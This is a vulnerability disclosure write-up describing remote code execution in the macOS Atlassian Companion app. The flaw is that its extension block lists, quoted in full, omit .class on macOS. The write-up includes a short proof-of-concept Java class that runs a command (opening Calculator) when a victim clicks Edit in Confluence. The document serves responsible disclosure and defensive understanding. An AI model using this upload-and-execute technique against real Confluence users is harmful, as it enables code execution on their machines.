macOS Atlassian Companion Remote Code Execution

Overview

I identified a vulnerability that allowed executing code on victims’ machines after they click the Edit button on a Confluence page when Atlassian Companion is installed on macOS.

The Atlassian Companion app enables users to edit Confluence files in their preferred desktop application, then save the file back to Confluence automatically.
Source: https://confluence.atlassian.com/doc/administering-the-atlassian-companion-app-958456281.html

Exploitation conditions

Victim must have Atlassian Companion installed.
Victim clicks on the Edit button in Confluence, so the malicious file is opened in the Atlassian Companion App on macOS (standard app behavior).
Victim must have Java installed.

Exploitation results

Remote code execution on macOS machine

Vulnerability description

Atlassian Companion App on macOS allows editing documents saved in Confluence. When user clicks the Edit button:

the file is downloaded to the local machine
the app performs extensions validation
the app opens the downloaded document
when the document is updated, it is uploaded back to the Confluence.

The problem lies in the point 2.. Atlassian was aware that some of the extensions had to be blocked. There is a blocklist present in the app’s sources - in the BlockAllowExtensionList.ts:

// 14 items
const macOSDangerous = ['action', 'app', 'bash', 'bin', 'command', 'csh', 'osx', 'pkg', 'sh', 'term', 'terminal', 'tool', 'workflow', 'zsh'];
// 154 items
const windowsDangerous = ['0_full_0_tgod_signed', '386', '9', 'aepl', 'aru', 'atm', 'aut', 'bat', 'bhx', 'bin', 'bkd', 'blf', 'bll', 'bmw', 'boo', 'bps', 'bqf', 'buk', 'bup', 'bxz', 'capxml', 'cc', 'ce0', 'ceo', 'cfxxe', 'chm', 'cih', 'cla', 'class', 'cmd', 'com', 'cpl', 'ctbl', 'cxq', 'cyw', 'dbd', 'delf', 'dev', 'dlb', 'dli', 'dll', 'dllx', 'dom', 'drv', 'dx', 'dxz', 'dyv', 'dyz', 'exe', 'exe1', 'exe_renamed', 'ezt', 'fag', 'fjl', 'fnr', 'fuj', 'gadget', 'gzquar', 'hlp', 'hlw', 'hsq', 'hta', 'hts', 'inf1', 'ins', 'inx', 'isu', 'iva', 'iws', 'jar', 'job', 'js', 'jse', 'kcd', 'let', 'lik', 'lkh', 'lnk', 'lok', 'lpaq5', 'mcq', 'mfu', 'mjg', 'mjz', 'msc', 'msi', 'msp', 'mst', 'nls', 'oar', 'ocx', 'osa', 'ozd', 'paf', 'pcx', 'pgm', 'php3', 'pid', 'pif', 'plc', 'pr', 'ps1', 'qit', 'qrn', 'reg', 'rgs', 'rhk', 'rna', 'rsc_tmp', 's7p', 'scr', 'sct', 'shb', 'shs', 'ska', 'smm', 'smtmp', 'sop', 'spam', 'ssy', 'swf', 'sys', 'tko', 'tps', 'tsa', 'tti', 'txs', 'u3p', 'upa', 'uzy', 'vb', 'vba', 'vbe', 'vbs', 'vbscript', 'vbx', 'vexe', 'vxd', 'vzr', 'wlpginstall', 'wmf', 'ws', 'wsc', 'wsf', 'wsh', 'xdu', 'xir', 'xlm', 'xlv', 'xnt', 'xnxx', 'xtbl', 'zix', 'zvz'];
// 207 items
const highRisk = ['0xe', '73k', '89k', '8ck', 'a6p', 'a7r', 'ac', 'acc', 'acr', 'actc', 'action', 'actm', 'ahk', 'air', 'apk', 'app', 'appimage', 'applescript', 'arscript', 'as', 'asb', 'awk', 'azw2', 'ba_', 'bat', 'beam', 'bin', 'btm', 'caction', 'cel', 'celx', 'cgi', 'chm', 'cmd', 'cof', 'coffee', 'com', 'command', 'crt', 'csh', 'cyw', 'dek', 'dld', 'dmc', 'dmg', 'dotm', 'ds', 'dxl', 'e_e', 'ear', 'ebm', 'ebs', 'ebs2', 'ecf', 'eham', 'elf', 'epk', 'es', 'esh', 'ex4', 'ex5', 'ex_', 'exe', 'exe1', 'exopc', 'ezs', 'ezt', 'fas', 'fky', 'fpi', 'frs', 'fxp', 'gadget', 'gpe', 'gpu', 'gs', 'ham', 'hms', 'hpf', 'hta', 'icd', 'iim', 'ipa', 'ipf', 'isp', 'isu', 'ita', 'jar', 'js', 'jse', 'jsf', 'jsx', 'kix', 'ksh', 'kx', 'lo', 'ls', 'm3g', 'mac', 'mam', 'mcr', 'mel', 'mem', 'mio', 'mlx', 'mm', 'mpx', 'mrc', 'mrp', 'ms', 'msi', 'msl', 'mxe', 'n', 'ncl', 'nexe', 'obs', 'ore', 'osx', 'otm', 'out', 'paf', 'paf.exe', 'pex', 'phar', 'pif', 'plsc', 'plx', 'potm', 'ppam', 'ppsm', 'prc', 'prg', 'ps1', 'pvd', 'pwc', 'pyc', 'pyo', 'qit', 'qpx', 'rbf', 'rbx', 'rfu', 'rgs', 'rox', 'rpj', 'run', 'rxe', 's2a', 'sbs', 'sca', 'scar', 'scb', 'scpt', 'scptd', 'scr', 'script', 'sct', 'seed', 'server', 'shb', 'sk', 'smm', 'snap', 'spr', 'sts', 'tcp', 'thm', 'tiapp', 'tlb', 'tms', 'u3p', 'udf', 'upx', 'url', 'vbe', 'vbs', 'vbscript', 'vdo', 'vexe', 'vlx', 'vpm', 'vxp', 'wcm', 'widget', 'wiz', 'workflow', 'wpk', 'wpm', 'ws', 'wsf', 'wsh', 'x86', 'x86_64', 'xap', 'xbap', 'xbe', 'xex', 'xlam', 'xlm', 'xltm', 'xqt', 'xys', 'zl9'];

//This one is for an additional block list request from security \ customers
const highRiskEvenMore = ['html', 'java'];
[...]

The class extension is only in the windowsDangerous blocklist, so, on macOS, it is an allowed extension.

Let’s create a malicious Hello.java file:

public class Hello {
  public static void main(String[] args){
    System.out.print("Hello World");
    try {
      Process process = Runtime.getRuntime().exec("open -b com.apple.calculator");
    } catch(Exception e) {
    }
  }
}

Compile it:

javac Hello.java

When the compiled Hello.class file is uploaded to the Confluence and somebody clicks edit - the code will be executed, and thus, the Calculator is spawned.

Fix

The .class file extension is now blocked also on macOS. Please make a notice that, as always, this vulnerability was reported according to the Responsible Disclosure rules. Atlassian received the report in 2021, fixed the vulnerability within 90 days, and paid a bounty. Kudos 👏🏻